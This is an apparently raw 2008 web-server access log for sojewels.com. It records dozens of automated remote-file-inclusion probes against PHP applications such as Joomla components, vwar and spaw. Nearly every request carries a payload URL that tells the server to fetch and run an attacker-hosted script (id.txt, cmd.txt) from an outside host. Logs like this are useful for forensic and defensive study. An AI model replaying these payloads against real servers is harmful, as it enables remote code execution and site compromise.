221.144.12.141 - - [30/Jul/2008:18:19:42 -0700] "GET /logs/access_080331.log//config/dbutil.bck.php?confdir=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
195.95.229.220 - - [30/Jul/2008:18:22:05 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://h-pro.ru/lang/inc? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
195.95.229.220 - - [30/Jul/2008:18:22:05 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://h-pro.ru/lang/inc? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
195.95.229.220 - - [30/Jul/2008:18:22:06 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://h-pro.ru/lang/inc? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
207.44.234.103 - - [30/Jul/2008:18:24:40 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
207.44.234.103 - - [30/Jul/2008:18:24:40 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
207.44.234.103 - - [30/Jul/2008:18:24:41 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
85.234.133.173 - - [30/Jul/2008:18:25:10 -0700] "GET /logs/access_080131.log//musicmachine.biz.log-joomla/index.php?option=com_restaurante&task=ftp://81.177.8.194/Upload/trem/oldbisok??http://artyficio.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
85.234.133.173 - - [30/Jul/2008:18:25:10 -0700] "GET //musicmachine.biz.log-joomla/index.php?option=com_restaurante&task=ftp://81.177.8.194/Upload/trem/oldbisok??http://artyficio.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
85.234.133.173 - - [30/Jul/2008:18:25:10 -0700] "GET /logs//musicmachine.biz.log-joomla/index.php?option=com_restaurante&task=ftp://81.177.8.194/Upload/trem/oldbisok??http://artyficio.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
85.234.133.173 - - [30/Jul/2008:18:26:18 -0700] "GET //musicmachine.biz.log-joomla/index.php?option=com_restaurante&task=ftp://81.177.8.194/Upload/trem/oldbisok??http://p2air.co.uk/calendar/includes/.bash/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.sojewels.com"
85.234.133.173 - - [30/Jul/2008:18:26:18 -0700] "GET /logs//musicmachine.biz.log-joomla/index.php?option=com_restaurante&task=ftp://81.177.8.194/Upload/trem/oldbisok??http://p2air.co.uk/calendar/includes/.bash/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.sojewels.com"
83.12.119.178 - - [30/Jul/2008:18:26:25 -0700] "GET /logs/access.log//atom.php5?page=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
210.245.166.92 - - [30/Jul/2008:18:26:33 -0700] "GET /logs/access.log//atom.php5?page=http://www.adoradores.kit.net/general? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
210.245.166.92 - - [30/Jul/2008:18:26:33 -0700] "GET //atom.php5?page=http://www.adoradores.kit.net/general? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
83.12.119.178 - - [30/Jul/2008:18:26:34 -0700] "GET //atom.php5?page=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
210.245.166.92 - - [30/Jul/2008:18:26:34 -0700] "GET /logs//atom.php5?page=http://www.adoradores.kit.net/general? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
83.12.119.178 - - [30/Jul/2008:18:26:42 -0700] "GET /logs//atom.php5?page=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
67.19.204.226 - - [30/Jul/2008:18:26:49 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
67.19.204.226 - - [30/Jul/2008:18:26:49 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
67.19.204.226 - - [30/Jul/2008:18:26:49 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
210.245.166.92 - - [30/Jul/2008:18:26:55 -0700] "GET /logs/access.log//atom.php5?page=http://www.adoradores.kit.net/general? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
210.245.166.92 - - [30/Jul/2008:18:26:56 -0700] "GET //atom.php5?page=http://www.adoradores.kit.net/general? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
210.245.166.92 - - [30/Jul/2008:18:26:56 -0700] "GET /logs//atom.php5?page=http://www.adoradores.kit.net/general? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
67.19.204.226 - - [30/Jul/2008:18:27:04 -0700] "GET /logs/access_080331.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
67.19.204.226 - - [30/Jul/2008:18:27:09 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
67.19.204.226 - - [30/Jul/2008:18:27:09 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
67.19.204.226 - - [30/Jul/2008:18:27:09 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
195.95.229.220 - - [30/Jul/2008:18:27:20 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://h-pro.ru/lang/inc? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
119.63.193.101 - - [30/Jul/2008:18:29:05 -0700] "GET / HTTP/1.1" 200 779 "-" "Baiduspider+(+http://help.baidu.jp/system/05.html)" "www.sojewels.com"
210.245.166.92 - - [30/Jul/2008:18:32:03 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.adoradores.kit.net/general? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
210.245.166.92 - - [30/Jul/2008:18:32:04 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.adoradores.kit.net/general? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
210.245.166.92 - - [30/Jul/2008:18:32:04 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.adoradores.kit.net/general? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
85.234.133.173 - - [30/Jul/2008:18:32:36 -0700] "GET //musicmachine.biz.log-joomla/index.php?option=com_restaurante&task=ftp://81.177.8.194/Upload/trem/oldbisok??http://www.freewebtown.com/cupu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
210.245.166.92 - - [30/Jul/2008:18:32:39 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.adoradores.kit.net/general? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
210.245.166.92 - - [30/Jul/2008:18:32:40 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.adoradores.kit.net/general? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
210.245.166.92 - - [30/Jul/2008:18:32:41 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.adoradores.kit.net/general? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
208.98.1.12 - - [30/Jul/2008:18:32:55 -0700] "GET /errors.php?error=http://www.cafelecaire.com/gallery/data/idd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.sojewels.com"
208.98.1.12 - - [30/Jul/2008:18:32:55 -0700] "GET /logs/errors.php?error=http://www.cafelecaire.com/gallery/data/idd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.sojewels.com"
67.19.204.226 - - [30/Jul/2008:18:33:24 -0700] "GET /logs/access.log%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
201.130.79.132 - - [30/Jul/2008:18:33:26 -0700] "GET /logs/access_080501.log//tools/send_reminders.php?noSet=http://utenti.lycos.it/kaizoku384/nix/id4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
201.130.79.132 - - [30/Jul/2008:18:33:27 -0700] "GET //tools/send_reminders.php?noSet=http://utenti.lycos.it/kaizoku384/nix/id4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
201.130.79.132 - - [30/Jul/2008:18:33:27 -0700] "GET /logs//tools/send_reminders.php?noSet=http://utenti.lycos.it/kaizoku384/nix/id4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
201.130.79.132 - - [30/Jul/2008:18:36:51 -0700] "GET //tools/send_reminders.php?noSet=http://geo.ya.com/v3g3t4/cc/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
85.234.133.173 - - [30/Jul/2008:18:36:57 -0700] "GET /logs/access_080131.log//musicmachine.biz.log-joomla/index.php?option=com_restaurante&task=ftp://81.177.8.194/Upload/trem/oldbisok??http://www.freewebtown.com/cupu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
85.234.133.173 - - [30/Jul/2008:18:36:58 -0700] "GET /logs//musicmachine.biz.log-joomla/index.php?option=com_restaurante&task=ftp://81.177.8.194/Upload/trem/oldbisok??http://www.freewebtown.com/cupu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
195.95.229.220 - - [30/Jul/2008:18:37:47 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://h-pro.ru/lang/inc? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
195.95.229.220 - - [30/Jul/2008:18:39:32 -0700] "GET /logs/access.log/convert/mvcw.php?step=1&vwar_root=http://h-pro.ru/lang/inc? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
195.95.229.220 - - [30/Jul/2008:18:39:33 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://h-pro.ru/lang/inc? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
195.95.229.220 - - [30/Jul/2008:18:39:33 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://h-pro.ru/lang/inc? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
190.81.184.98 - - [30/Jul/2008:18:41:29 -0700] "GET /logs/access.log/vwar/includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.sv-haslach.com/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
190.81.184.98 - - [30/Jul/2008:18:41:29 -0700] "GET /vwar/includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.sv-haslach.com/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
190.81.184.98 - - [30/Jul/2008:18:41:30 -0700] "GET /logs/vwar/includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.sv-haslach.com/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
210.245.166.92 - - [30/Jul/2008:18:42:52 -0700] "GET /logs/access_080501.log//atom.php5?page=http://www.adoradores.kit.net/general? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
204.15.10.22 - - [30/Jul/2008:18:48:30 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://dantman.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.sojewels.com"
204.15.10.22 - - [30/Jul/2008:18:48:30 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://dantman.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.sojewels.com"
193.178.228.12 - - [30/Jul/2008:18:49:01 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://dantman.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.sojewels.com"
193.178.228.12 - - [30/Jul/2008:18:49:01 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://dantman.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.sojewels.com"
193.178.228.12 - - [30/Jul/2008:18:49:02 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://dantman.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.sojewels.com"
193.178.228.12 - - [30/Jul/2008:18:49:02 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://dantman.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.sojewels.com"
201.130.79.132 - - [30/Jul/2008:18:49:39 -0700] "GET /logs/access_080501.log//tools/send_reminders.php?noSet=http://utenti.lycos.it/kaizoku384/nix/id4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
201.130.79.132 - - [30/Jul/2008:18:49:39 -0700] "GET //tools/send_reminders.php?noSet=http://utenti.lycos.it/kaizoku384/nix/id4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
201.130.79.132 - - [30/Jul/2008:18:49:39 -0700] "GET /logs//tools/send_reminders.php?noSet=http://utenti.lycos.it/kaizoku384/nix/id4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.186.169.135 - - [30/Jul/2008:18:49:57 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://h-pro.ru/lang/inc? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.186.169.135 - - [30/Jul/2008:18:52:25 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://h-pro.ru/lang/inc? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.186.169.135 - - [30/Jul/2008:18:52:25 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://h-pro.ru/lang/inc? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.186.169.135 - - [30/Jul/2008:18:52:26 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://h-pro.ru/lang/inc? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
210.245.166.92 - - [30/Jul/2008:18:55:07 -0700] "GET /logs/access_080501.log//config/dbutil.bck.php?confdir=http://www.adoradores.kit.net/general? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
210.245.166.92 - - [30/Jul/2008:18:55:08 -0700] "GET //config/dbutil.bck.php?confdir=http://www.adoradores.kit.net/general? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
210.245.166.92 - - [30/Jul/2008:18:55:08 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.adoradores.kit.net/general? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
210.245.166.92 - - [30/Jul/2008:18:55:12 -0700] "GET /logs/access_080331.log//config/dbutil.bck.php?confdir=http://www.adoradores.kit.net/general? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
64.246.52.46 - - [30/Jul/2008:18:56:17 -0700] "GET /logs/access.log//contenido/classes/class.inuse.php?cfg[path][contenido]=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
64.246.52.46 - - [30/Jul/2008:18:56:17 -0700] "GET //contenido/classes/class.inuse.php?cfg[path][contenido]=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
64.246.52.46 - - [30/Jul/2008:18:56:18 -0700] "GET /logs//contenido/classes/class.inuse.php?cfg[path][contenido]=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
153.19.161.46 - - [30/Jul/2008:18:58:24 -0700] "GET /logs/access.log//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
153.19.161.46 - - [30/Jul/2008:18:58:24 -0700] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
153.19.161.46 - - [30/Jul/2008:18:58:24 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
201.130.79.132 - - [30/Jul/2008:19:02:11 -0700] "GET /logs/access_080501.log//tools/send_reminders.php?noSet=http://geo.ya.com/v3g3t4/cc/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
201.130.79.132 - - [30/Jul/2008:19:02:12 -0700] "GET /logs//tools/send_reminders.php?noSet=http://geo.ya.com/v3g3t4/cc/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
190.81.184.98 - - [30/Jul/2008:19:13:34 -0700] "GET /logs/access_080301.log/vwar/includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.sv-haslach.com/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
210.245.166.92 - - [30/Jul/2008:19:23:45 -0700] "GET /logs/access_080501.log//config/dbutil.bck.php?confdir=http://www.adoradores.kit.net/general? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
210.245.166.92 - - [30/Jul/2008:19:23:46 -0700] "GET //config/dbutil.bck.php?confdir=http://www.adoradores.kit.net/general? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
210.245.166.92 - - [30/Jul/2008:19:23:46 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.adoradores.kit.net/general? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
210.245.166.92 - - [30/Jul/2008:19:23:50 -0700] "GET /logs/access_080331.log//config/dbutil.bck.php?confdir=http://www.adoradores.kit.net/general? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
195.95.229.220 - - [30/Jul/2008:19:26:10 -0700] "GET /logs/access_080301.log/convert/mvcw.php?step=1&vwar_root=http://h-pro.ru/lang/inc? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
85.239.113.1 - - [30/Jul/2008:19:34:32 -0700] "GET /errors.php?error=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
190.81.184.98 - - [30/Jul/2008:19:39:08 -0700] "GET /logs/access_080501.log/vwar/includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.sv-haslach.com/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
85.239.113.1 - - [30/Jul/2008:19:39:30 -0700] "GET /logs/access.log/errors.php?error=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
85.239.113.1 - - [30/Jul/2008:19:39:31 -0700] "GET /errors.php?error=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
85.239.113.1 - - [30/Jul/2008:19:39:31 -0700] "GET /logs/errors.php?error=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
64.26.63.17 - - [30/Jul/2008:19:47:02 -0700] "GET /logs/access_080501.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://paijoe.007gb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
64.26.63.17 - - [30/Jul/2008:19:47:02 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://paijoe.007gb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
64.26.63.17 - - [30/Jul/2008:19:47:02 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://paijoe.007gb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
81.169.186.162 - - [30/Jul/2008:19:52:41 -0700] "GET /logs/access.log/errors.php?error=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
81.169.186.162 - - [30/Jul/2008:19:52:42 -0700] "GET /errors.php?error=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
81.169.186.162 - - [30/Jul/2008:19:52:42 -0700] "GET /logs/errors.php?error=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
216.239.0.245 - - [30/Jul/2008:19:54:21 -0700] "GET /logs/access.log/?cfg[path][contenido]=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
216.239.0.245 - - [30/Jul/2008:19:54:21 -0700] "GET /logs/?cfg[path][contenido]=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 200 1796 "-" "libwww-perl/5.79" "www.sojewels.com"
216.239.0.245 - - [30/Jul/2008:19:54:21 -0700] "GET /?cfg[path][contenido]=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.sojewels.com"
210.245.166.92 - - [30/Jul/2008:19:56:07 -0700] "GET /logs/access.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.adoradores.kit.net/general? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
210.245.166.92 - - [30/Jul/2008:19:56:08 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.adoradores.kit.net/general? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
210.245.166.92 - - [30/Jul/2008:19:56:08 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.adoradores.kit.net/general? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
85.214.28.190 - - [30/Jul/2008:19:59:55 -0700] "GET /logs/access_080331.log//?path%5Bdocroot%5D=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.sojewels.com"
85.214.28.190 - - [30/Jul/2008:19:59:56 -0700] "GET //?path%5Bdocroot%5D=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.sojewels.com"
85.214.28.190 - - [30/Jul/2008:19:59:56 -0700] "GET /logs//?path%5Bdocroot%5D=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 200 1801 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.sojewels.com"
87.244.11.20 - - [30/Jul/2008:20:00:06 -0700] "GET /logs/access_080331.log//?path%5Bdocroot%5D=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.sojewels.com"
87.244.11.20 - - [30/Jul/2008:20:00:10 -0700] "GET //?path%5Bdocroot%5D=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.sojewels.com"
87.244.11.20 - - [30/Jul/2008:20:00:10 -0700] "GET /logs//?path%5Bdocroot%5D=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 200 1801 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.sojewels.com"
85.239.113.1 - - [30/Jul/2008:20:00:51 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
85.239.113.1 - - [30/Jul/2008:20:00:51 -0700] "GET ///vwar/backup/errors.php?error=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
85.239.113.1 - - [30/Jul/2008:20:00:52 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
87.244.11.20 - - [30/Jul/2008:20:01:35 -0700] "GET /logs/access_080331.log//?path%5Bdocroot%5D=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.sojewels.com"
87.244.11.20 - - [30/Jul/2008:20:01:36 -0700] "GET //?path%5Bdocroot%5D=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.sojewels.com"
87.244.11.20 - - [30/Jul/2008:20:01:36 -0700] "GET /logs//?path%5Bdocroot%5D=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 200 1801 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.sojewels.com"
74.6.8.97 - - [30/Jul/2008:20:33:15 -0700] "GET /?M=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sojewels.com"
